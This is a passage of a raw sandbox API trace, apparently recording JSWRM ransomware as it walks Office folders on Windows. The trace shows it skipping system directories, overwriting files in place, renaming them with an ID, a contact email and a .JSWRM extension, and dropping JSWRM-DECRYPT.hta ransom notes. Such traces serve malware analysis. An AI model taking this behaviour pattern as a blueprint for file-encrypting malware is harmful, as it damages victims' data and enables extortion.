Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0068.763] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=590523) returned 1 [0068.763] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.763] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0068.763] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0068.778] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.778] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0068.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0068.779] CloseHandle (hObject=0x458) returned 1 [0068.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bad8 [0068.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0068.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0068.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0068.779] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x1ff448 [0068.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0068.779] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.779] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0068.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0068.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bad8 | out: hHeap=0x1e0000) returned 1 [0068.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ae28 | out: hHeap=0x1e0000) returned 1 [0068.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0068.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0068.780] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x60002, dwReserved1=0x224ba8, cFileName="pkeyconfig.companion.dll", cAlternateFileName="PKEYCO~1.DLL")) returned 1 [0068.780] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2=".") returned 1 [0068.780] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="..") returned 1 [0068.780] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="...") returned 1 [0068.780] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="windows") returned -1 [0068.780] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="recovery") returned -1 [0068.780] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="perflogs") returned 1 [0068.780] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="documents and settings") returned 1 [0068.780] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.780] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="system volume information") returned -1 [0068.780] lstrcmpiW (lpString1="pkeyconfig.companion.dll", lpString2="msocache") returned 1 [0068.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0068.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig.companion.dll", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0068.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0068.780] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig.companion.dll", cchWideChar=24, lpMultiByteStr=0x241038, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig.companion.dll", lpUsedDefaultChar=0x0) returned 24 [0068.780] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0068.780] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0068.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig.companion.dll", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0068.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0068.781] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pkeyconfig.companion.dll", cchWideChar=24, lpMultiByteStr=0x241268, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pkeyconfig.companion.dll", lpUsedDefaultChar=0x0) returned 24 [0068.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0068.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0068.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b1c8 | out: hHeap=0x1e0000) returned 1 [0068.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0068.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.781] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b5b0d00, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0xd9ff8cc1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x5b5b0d00, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x48c0, dwReserved0=0x60002, dwReserved1=0x224ba8, cFileName="pkeyconfig.companion.dll", cAlternateFileName="PKEYCO~1.DLL")) returned 0 [0068.781] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0068.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0068.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0068.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0068.781] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xd9f60362, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xa0a26299, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xda982389, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 0 [0068.781] FindClose (in: hFindFile=0x231f40 | out: hFindFile=0x231f40) returned 1 [0068.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0068.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0068.781] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224ee8 | out: hHeap=0x1e0000) returned 1 [0068.781] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xd99442a7, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="OfficeSoftwareProtectionPlatform", cAlternateFileName="OFFICE~1")) returned 1 [0068.781] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2=".") returned 1 [0068.781] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="..") returned 1 [0068.781] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="...") returned 1 [0068.781] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="windows") returned -1 [0068.781] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="recovery") returned -1 [0068.781] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="perflogs") returned -1 [0068.781] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="documents and settings") returned 1 [0068.781] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="$RECYCLE.BIN") returned 1 [0068.781] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="system volume information") returned -1 [0068.781] lstrcmpiW (lpString1="OfficeSoftwareProtectionPlatform", lpString2="msocache") returned 1 [0068.781] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0068.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0068.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236ae0 [0068.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0068.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0068.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0068.782] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\jswrm-decrypt.hta")) returned 0xffffffff [0068.782] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0068.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.782] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.782] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0068.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0068.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0068.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0068.783] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0068.783] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0068.783] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0068.783] SetFilePointer (in: hFile=0x298, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.783] WriteFile (in: hFile=0x298, lpBuffer=0x345bf70*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bf3c, lpOverlapped=0x0 | out: lpBuffer=0x345bf70*, lpNumberOfBytesWritten=0x345bf3c*=0x230c, lpOverlapped=0x0) returned 1 [0068.784] CloseHandle (hObject=0x298) returned 1 [0068.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0068.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24dfa0 | out: hHeap=0x1e0000) returned 1 [0068.784] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0068.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0068.784] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0068.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0068.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0068.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e570 [0068.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0068.785] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\officesoftwareprotectionplatform\\jswrm-decrypt.hta")) returned 0x20 [0068.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e570 | out: hHeap=0x1e0000) returned 1 [0068.785] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0068.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0068.785] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\OfficeSoftwareProtectionPlatform\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1fa795ab, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName=".", cAlternateFileName="")) returned 0x231bc0 [0068.785] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0068.785] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd99442a7, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xd99442a7, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1fa795ab, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="..", cAlternateFileName="")) returned 1 [0068.785] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0068.785] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0068.785] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa795ab, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fa795ab, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fa9f85d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.785] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.785] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.785] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.785] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.785] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.785] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.785] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.785] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.785] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.785] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.785] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.785] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0068.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.786] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22eca0 [0068.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0068.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0068.786] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fa795ab, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fa795ab, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fa9f85d, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 0 [0068.786] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0068.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22eca0 | out: hHeap=0x1e0000) returned 1 [0068.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0068.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0068.786] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4accd6e1, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4accd6e1, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x4accd6e1, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22c3c4, cFileName="Source Engine", cAlternateFileName="SOURCE~1")) returned 1 [0068.786] lstrcmpiW (lpString1="Source Engine", lpString2=".") returned 1 [0068.786] lstrcmpiW (lpString1="Source Engine", lpString2="..") returned 1 [0068.786] lstrcmpiW (lpString1="Source Engine", lpString2="...") returned 1 [0068.786] lstrcmpiW (lpString1="Source Engine", lpString2="windows") returned -1 [0068.786] lstrcmpiW (lpString1="Source Engine", lpString2="recovery") returned 1 [0068.786] lstrcmpiW (lpString1="Source Engine", lpString2="perflogs") returned 1 [0068.786] lstrcmpiW (lpString1="Source Engine", lpString2="documents and settings") returned 1 [0068.786] lstrcmpiW (lpString1="Source Engine", lpString2="$RECYCLE.BIN") returned 1 [0068.786] lstrcmpiW (lpString1="Source Engine", lpString2="system volume information") returned -1 [0068.786] lstrcmpiW (lpString1="Source Engine", lpString2="msocache") returned 1 [0068.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224c40 [0068.786] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0068.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0068.786] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.787] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.787] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.787] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\jswrm-decrypt.hta")) returned 0xffffffff [0068.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.807] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345be5c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0068.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24c1d0 [0068.807] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0068.807] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24dfa0 [0068.807] 